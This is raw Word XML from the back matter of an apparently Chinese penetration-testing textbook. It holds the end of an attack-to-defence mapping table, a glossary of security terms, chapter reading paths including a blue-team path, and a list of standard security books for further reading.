              <w:t xml:space="preserve">Metasploit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">载荷</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">已知载荷特征检测、补丁、网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17 / 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">后渗透持久化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">自启动/计划任务审计、文件完整性、EDR</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">行为告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="407"/>
    <w:bookmarkStart w:id="408" w:name="附录-c-三态与核心术语速查"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三态与核心术语速查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：①【标准/通用原理，跨环境成立】（TCP/RFC、OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分类、密码学原理）·②【环境/版本相关】（命令输出、漏洞是否存在、路径/端口）·③【简化/示意/概念演示，非精确武器化】。三者绝不混淆。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术语</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">全称</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">含义</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">术语</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">全称</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">含义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Adversarial Tactics, Techniques &amp; Common Knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RoE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rules of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Engagement（授权范围）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server-Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">LFI/RFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Local/Remote File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Penetration Testing Execution Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NX/ASLR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">不可执行栈</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">地址随机化</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">KWS→（本馆）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DAI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dynamic ARP Inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="408"/>
    <w:bookmarkStart w:id="409" w:name="附录-d-章节依赖与读者路径"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> D · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节依赖与读者路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">依赖主线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（靶场，全书实操前置）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷二侦察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷三</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷四系统（并行攻击面）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷五防御（横向收口）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capstone（串成完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill-chain）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">四条读者路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">渗透速通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 8 → 9 → 10 → 11 → 22。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络攻防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 4 → 5 → 6 → 7。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">二进制与提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 13 → 14 → 15 → 17。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：把前四卷每个攻击的「防御对照框」横向读一遍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 19 → 20 → 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的防御清单。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="409"/>
    <w:bookmarkStart w:id="410" w:name="附录-e-延伸阅读白名单章节级不编页码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> E · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单，章节级，不编页码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Georgia Weidman《Penetration Testing: A Hands-On Introduction to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking》；OffSec《PWK/PEN-200》；Stuttard–Pinto《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》；Kim《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hacker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Playbook》；Erickson《Hacking:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The Art of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation》；《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shellcoder’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》；OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top 10 / Testing Guide、PortSwigger Web Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Academy；Sanders《Practical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Packet Analysis》、Lyon《Nmap Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning》；Aumasson《Serious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cryptography》、Ferguson–Schneier–Kohno《Cryptography </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Engineering》；Bejtlich《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Practice of Network Security Monitoring》、MITRE ATT&amp;CK、NIST SP 800 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列、CIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Benchmarks、Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Unleashed；以及馆藏《从位到物联》（网络栈/系统/密码学数学/IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的回指底座）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="410"/>
    <w:bookmarkEnd w:id="4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1"/>
  </w:num>
  <w:num w:numId="11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1"/>
  </w:num>
  <w:num w:numId="11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1"/>
  </w:num>
  <w:num w:numId="11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0">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="11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1"/>
  </w:num>
  <w:num w:numId="11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1"/>
  </w:num>
  <w:num w:numId="11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1"/>
  </w:num>
  <w:num w:numId="11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2026-06-14T11:03:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-14T11:03:35Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>